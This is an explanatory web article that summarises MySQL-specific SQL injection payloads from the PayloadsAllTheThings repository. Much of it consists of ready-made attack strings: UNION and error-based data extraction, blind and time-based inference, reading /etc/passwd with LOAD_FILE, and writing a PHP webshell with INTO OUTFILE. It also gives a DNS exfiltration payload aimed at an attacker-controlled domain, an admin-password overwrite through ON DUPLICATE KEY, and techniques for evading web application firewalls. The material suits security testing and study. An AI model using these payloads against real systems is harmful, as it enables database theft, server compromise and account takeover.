MySQL Specific SQL Injection Payloads: Techniques and Examples from PayloadsAllTheThings
MySQL specific SQL injection payloads exploit database-specific functions, metadata schemas, and syntax variations to enumerate databases, extract sensitive data, execute system commands, and bypass Web Application Firewalls.
The swisskyrepo/PayloadsAllTheThings repository contains a comprehensive catalog of MySQL specific SQL injection payloads organized by exploitation methodology. These payloads demonstrate how attackers manipulate MySQL's unique behaviors—such as information_schema queries, conditional comments, and file system primitives—to compromise database systems and achieve remote code execution.
Enumeration via Default Databases and Information Schema
MySQL installations ship with built-in schemas that leak system metadata. Attackers target the mysql and information_schema databases to discover table structures, column names, and user privileges before extracting sensitive data.
The information_schema database serves as the primary metadata repository in MySQL. According to the source code in SQL Injection/MySQL Injection.md, attackers query information_schema.schemata, information_schema.tables, and information_schema.columns to map the database architecture. The mysql database contains authentication credentials and privilege tables that enable privilege escalation attacks.
Comment Techniques for Query Truncation
MySQL supports multiple comment syntaxes that allow attackers to truncate query strings or execute version-conditional code. The repository documents four primary comment styles in SQL Injection/MySQL Injection.md:
#– Hash comment (single line)--– Double-dash comment (requires trailing space)/* … */– Multi-line comment block/*! … */– Conditional execution comment (executes content only if MySQL version matches)
Attackers use these comments to neutralize trailing query segments. For example, injecting ' OR 1=1 -- effectively comments out password checks or LIMIT clauses in the original query.
Testing Injection Points
Before launching complex attacks, security testers verify injection viability using database-specific strings. The repository distinguishes between string context and numeric context testing in SQL Injection/MySQL Injection.md:
-- String context testing (quote manipulation)
1' AND 1=1 --+
1' AND 1=2 --+
-- Numeric context testing (no quotes required)
1 AND 1=1
1 AND 1=2
These tests reveal how the application parses quotes, backslashes, and boolean logic, determining whether the injection point accepts direct SQL manipulation or requires encoding bypasses.
Union-Based SQL Injection Techniques
Detecting Column Count
Successful UNION SELECT operations require matching the exact column count of the original query. The repository outlines three methods in SQL Injection/MySQL Injection.md for determining column numbers:
- Iterative NULL injection – Adding
NULLvalues until the query succeeds:' UNION SELECT NULL--,' UNION SELECT NULL,NULL-- - ORDER BY enumeration – Using
ORDER BY 1,ORDER BY 2until an error indicates the column limit - LIMIT INTO – Leveraging
LIMIT 0,1 INTO @a,@bto test variable assignment
Data Extraction with GROUP_CONCAT
Once column count is established, attackers use MySQL-specific aggregation functions to concatenate multiple rows into a single column response. The GROUP_CONCAT() function bypasses row limitations by combining results:
-1' UNION SELECT NULL,NULL,GROUP_CONCAT(0x7c,schema_name,0x7c) FROM information_schema.schemata--+
For MySQL 5.7 and later, json_arrayagg() provides an alternative that avoids GROUP_CONCAT length limitations, as documented in the WAF bypass section of SQL Injection/MySQL Injection.md.
Error-Based and Blind Injection Methods
Error-Based Data Leakage
When applications display database error messages, attackers force MySQL to embed sensitive data within error output strings. The repository highlights three primary error-based functions in SQL Injection/MySQL Injection.md:
EXTRACTVALUE()– Triggers XPath syntax errors containing injected dataUPDATEXML()– Generates XML parsing errors with embedded payloadsGTID_SUBSET()– Produces GTID set errors that leak data through error messages
Example payload using EXTRACTVALUE:
?id=1 AND EXTRACTVALUE(RAND(),CONCAT(0x7e,VERSION(),0x7e))--+
Boolean-Based Blind Injection
In blind scenarios where no data is returned visibly, attackers infer information through conditional statements. The repository documents boolean inference using IF(), MAKE_SET(), and string comparison operators:
?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1))>100,1,0)--+
This payload checks if the first character of the database user has an ASCII value greater than 100, revealing one bit of information per request.
Time-Based Delay Inference
When boolean responses are indistinguishable, attackers introduce measurable delays using SLEEP() or BENCHMARK():
-- Delay-based boolean extraction
?id=1 AND IF(ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))=65, SLEEP(5), 0)--+
-- CPU-intensive delay via BENCHMARK
?id=1 AND BENCHMARK(40000000,SHA1('test'))--+
The BENCHMARK() function executes an expression repeatedly, creating detectable latency without requiring time-based system functions that some WAFs block.
File System Interaction and Code Execution
Reading Arbitrary Files
MySQL's LOAD_FILE() function reads files accessible to the database process, enabling attackers to extract sensitive system files like /etc/passwd or application source code:
?id=1 UNION SELECT LOAD_FILE('/etc/passwd')--+
Writing Webshells via OUTFILE
When the MySQL user possesses FILE privileges and the secure-file-priv configuration permits, attackers write malicious files to the web root using INTO OUTFILE or INTO DUMPFILE:
-- PHP webshell deployment
?id=1 UNION SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php'--+
INTO DUMPFILE writes binary data without newline conversion, suitable for dropping compiled binaries or encoded payloads, as noted in SQL Injection/MySQL Injection.md.
Advanced MySQL Injection Techniques
DIOS (Dump In One Shot)
The Dump In One Shot technique concatenates entire database contents into a single result set, minimizing HTTP requests. This advanced method uses nested GROUP_CONCAT statements or json_arrayagg() to serialize multiple tables simultaneously, reducing detection footprints compared to iterative extraction.
Out-of-Band (OOB) Exfiltration
When direct output channels are blocked, attackers force MySQL to initiate external connections. The repository documents DNS exfiltration via LOAD_FILE() with UNC paths:
?id=1 LOAD_FILE(CONCAT('\\\\',VERSION(),'.attacker-controlled.com\\a.txt'))--+
This technique also enables NTLM hash theft by forcing Windows systems to authenticate against attacker-controlled SMB shares.
INSERT and ON DUPLICATE KEY Exploitation
In scenarios where injection occurs within INSERT statements, attackers leverage ON DUPLICATE KEY UPDATE to overwrite existing records. This technique effectively resets administrator passwords or escalates privileges by updating existing rows when primary key collisions occur:
INSERT INTO users (email,password) VALUES ('attacker@example.com','pwd'),('admin@example.com','pwd')
ON DUPLICATE KEY UPDATE password='hacked'--+
Truncation Attack Vectors
When applications enforce column length limits, attackers bypass authentication by exploiting string truncation. Submitting admin@example.com followed by spaces truncated to the column length may match the existing admin account, while the attacker controls the password field, as detailed in SQL Injection/MySQL Injection.md.
WAF Bypass Strategies
The repository catalogs multiple techniques to evade Web Application Firewalls in SQL Injection/MySQL Injection.md:
- Alternative metadata sources – Querying
mysql.innodb_table_statsinstead ofinformation_schema.tableswhen the latter is filtered - Version-agnostic variables – Using
@@innodb_versionor@@version_compile_osto fingerprint systems withoutVERSION() - Encoding tricks – Scientific notation (
1e1), conditional comments (/*!50000*/), and wide-byte (GBK) injection using%df'to consume escape backslashes - JSON aggregation – Replacing
GROUP_CONCATwithjson_arrayagg()to bypass function blacklists
Summary
- MySQL specific SQL injection payloads leverage database-native functions like
GROUP_CONCAT,EXTRACTVALUE, andLOAD_FILEto extract data and execute commands. - The
information_schemaandmysqlsystem databases provide complete metadata enumeration capabilities for mapping target architectures. - Union-based, error-based, boolean-blind, and time-based techniques provide alternative extraction paths depending on application response behaviors.
- File system primitives (
LOAD_FILE,INTO OUTFILE) enable reading sensitive files and writing webshells whenFILEprivileges are granted. - Advanced evasion uses conditional comments, alternative metadata tables, and wide-byte encoding to bypass Web Application Firewalls and input validation.
Frequently Asked Questions
What are MySQL specific SQL injection payloads?
MySQL specific SQL injection payloads are attack strings that exploit syntax and functions unique to the MySQL database engine, such as GROUP_CONCAT, EXTRACTVALUE, LOAD_FILE, and conditional comments (/*! … */). These payloads target MySQL's information_schema metadata, file system capabilities, and specific error message formats to extract data or execute commands, distinguishing them from generic SQL injection or database-agnostic techniques.
How do you enumerate databases using MySQL injection?
Attackers enumerate MySQL databases by querying the information_schema.schemata table through Union-based or Error-based injection. A typical payload uses GROUP_CONCAT(schema_name) to retrieve all database names in a single response: -1' UNION SELECT NULL,GROUP_CONCAT(0x7c,schema_name,0x7c) FROM information_schema.schemata--+. Alternatively, Blind injection techniques extract names character-by-character using SUBSTRING() and boolean comparisons when direct output is unavailable.
What is the difference between Union-based and Error-based MySQL injection?
Union-based injection requires the application to display query results directly, allowing attackers to append UNION SELECT statements that return arbitrary data alongside legitimate results. Error-based injection works when applications display database error messages but suppress query output; attackers use functions like EXTRACTVALUE() or UPDATEXML() to force MySQL to embed sensitive data within error strings (e.g., XPATH syntax error: '~5.7.38~'). Union-based methods are faster and more efficient, while error-based techniques function in scenarios where result sets are hidden but verbose errors leak to the user interface.
How do you bypass WAF filters in MySQL injection attacks?
WAF bypass techniques for MySQL injection include using alternative metadata tables like mysql.innodb_table_stats instead of filtered information_schema tables, employing json_arrayagg() instead of blacklisted GROUP_CONCAT(), and utilizing conditional comments (/*!50000*/) to obfuscate keywords. Wide-byte encoding using %df' consumes backslash escape characters in GBK character sets, while scientific notation (1e1) and version-specific conditional execution (/*!50718 SELECT*/) evade pattern-matching signatures.
Have a question about this repo?
These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:
curl -s "https://instagit.com/install.md" Maintain an open-source project? Get it listed too →